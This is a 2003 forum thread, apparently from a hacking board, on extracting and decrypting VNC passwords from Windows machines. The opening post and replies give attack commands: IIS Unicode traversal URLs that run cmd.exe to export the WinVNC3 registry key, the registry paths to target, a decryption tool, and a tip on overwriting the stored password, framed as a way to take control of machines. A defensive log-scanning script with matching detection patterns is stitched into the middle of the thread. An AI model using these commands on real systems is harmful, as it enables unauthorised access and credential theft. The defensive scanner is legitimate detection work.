Nikscap
May 14 2003, 03:18 PM
How to decrypt a VNC password through vulnerabilities, and gain full control of the machine???
About 70% of the time the session was not locked and it's very easy to enter,
and ~50% of VNC passwords are the same as the Administrator password! (or router, etc...)
With this solution it's possible to take control several times where you did not have other solutions!!!
Don't forget: train like you fight, let's go!
[1] - Unicode
Extract the VNC key
CODE
.../winnt/system32/cmd.exe?/c+regedit+/e+c:/vnc.reg+HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default
View the key like this
CODE
../winnt/system32/cmd.exe?/c+type+c:\vnc.reg
Now we can see the password in hex
[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
blablabla.....blablabla.....
"Password"=hex:27,8a,e1,7c,28,3f,8e,b7
blablabla.....blablabla.....
To decrypt the pass we have many solutions, but the easiest is to download this tool: VNcon
Go to menu password --> Decrypt password --> Copy the password in hex, and delete all the "," characters, like this: 278ae17c283f8eb7 = toto
[2] - SQL, WebDav, etc...
It's the same request! (but it's to finish the example...)
CODE
regedit /e c:/vnc.reg HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default
And # Warning! The path to extract the key can change according to the version (+ or - new). I write all the possibilities you can find!
CODE
A - HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default
B - HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3
C - HKEY_USERS\.DEFAULT\SOFTWARE\ORL\WinVNC3
I hope my way of explaining it is clear! Link about this: VNC use weak password protection mechanism
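A defender-side check for the requests described in the post above, as an added example that is not part of the original thread: it scans IIS-style log lines for web requests that run regedit /e against an ORL\WinVNC3 key or read back a .reg file. The log field layout, the sample lines, the rule names and the reading of status 200 as "the export was served" are assumptions made for this example.

```python
import re
from urllib.parse import unquote

# Constructed sample (date time c-ip method uri-stem uri-query status); "..." stays elided as in the post.
SAMPLE_LOG = r"""
2003-12-09 00:41:02 192.0.2.10 GET /index.html - 200
2003-12-09 00:41:07 192.0.2.44 GET /.../winnt/system32/cmd.exe /c+regedit+/e+c:/vnc.reg+HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default 200
2003-12-09 00:41:15 192.0.2.44 GET /.../winnt/system32/cmd.exe /c+type+c:\vnc.reg 200
2003-12-09 00:42:00 192.0.2.10 GET /search.asp q=vnc+manual 200
2003-12-09 00:43:30 192.0.2.77 GET /.../winnt/system32/cmd.exe /c+regedit+%2Fe+c:/x.reg+HKEY_USERS\.DEFAULT\SOFTWARE\ORL\WinVNC3 404
""".strip().splitlines()

RULES = {  # hypothetical rule names, matched against the decoded query string
    "registry-export": re.compile(r"\bregedit(\.exe)?\s+/e\b", re.I),
    "winvnc-key": re.compile(r"\\ORL\\WinVNC3", re.I),
    "reg-file-read": re.compile(r"\btype\s+\S+\.reg\b", re.I),
}
CMD_STEM = re.compile(r"cmd\.exe$", re.I)

def classify(stem, query):
    """Return the set of rule names matched by one request."""
    decoded = unquote(query.replace("+", " "))  # '+' separates arguments in these URLs
    tags = {name for name, rx in RULES.items() if rx.search(decoded)}
    if CMD_STEM.search(stem):
        tags.add("cmd-via-web")
    return tags

def scan(lines):
    """Return (client_ip, status, tags) for every request that matches a rule."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) != 7:
            continue  # skip header or malformed lines
        _, _, ip, _, stem, query, status = fields
        tags = classify(stem, query)
        if tags:
            hits.append((ip, int(status), tags))
    return hits

def exposed_to(hits):
    """Clients whose WinVNC3 export returned 200: treat the VNC password as disclosed."""
    need = {"registry-export", "winvnc-key"}
    return {ip for ip, status, tags in hits if status == 200 and need <= tags}

if __name__ == "__main__":
    for ip, status, tags in scan(SAMPLE_LOG):
        print(ip, status, sorted(tags))
    print("rotate VNC password; export served to:", sorted(exposed_to(scan(SAMPLE_LOG))))
```

Because the thread notes that the VNC password often matches the Administrator password, a hit from `exposed_to` is a reason to rotate both, not only the VNC one.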
DJVASTVASTY2K
Dec 8 2003, 05:19 PM
How Does This Method Work ??
I Tried The Commands But No Success
Please Can You Elaborate
Thank You
Best Regards
Adam
Vast Gsm
w00dy
Dec 8 2003, 05:48 PM
It's Unicode, so the server must be vulnerable and it must be run in the browser... IE
CODE http://www.whateverserver.com/.../winnt/system32/cmd.exe?/c+regedit+/e+c:/vnc.reg+HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default
Andy
Dec 9 2003, 12:38 AM
...as long as u have privilege to view the registry u can get vnc pass ez.
yuliang11
Dec 9 2003, 01:13 AM
This seems like a local exploit. What about VPN? Anyone know anything about it?
jeroen
Dec 9 2003, 09:16 AM
thanks for sharing man, this can come in handy sometimes
Flinston
Dec 13 2003, 08:47 AM
yeah this could be handy ... but you have to find IIS Unicode vulnerable MS Servers ...
Yorn
Dec 13 2003, 07:37 PM
Just get commandline access and run: "regedit /e c:/vnc.reg HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3" then view the contents of vnc.reg. Actually, if you wanted to change it, you could change it to an encoded one that you already had on your machine.
Fantafour
Dec 13 2003, 07:43 PM
Anyone got a successful injection? Still problems...
320X
Dec 15 2003, 12:44 AM
VIXVVXIV
Dec 15 2003, 12:54 AM
thanks for sharing man
VIXVVXIV
tolf
Dec 15 2003, 01:26 AM
ganz2
Dec 15 2003, 03:53 AM
very cool
PuPPaFiSH
Dec 15 2003, 06:59 AM
Thx for the info fella, I'll check it out.
Orangey
Dec 15 2003, 11:32 PM
Yes, This is a Local Exploit. But useful if you forget your password
net_runner
Dec 16 2003, 03:12 PM
very interesting the combo iis+vnc, thankz
batigoooal
Dec 17 2003, 03:00 PM
Another very useful tool to decrypt VNC passwords is vncon:
http://vncon.chronetal.co.uk/ You put the encrypted key in the software and it will decrypt the password automatically for you.
See ya,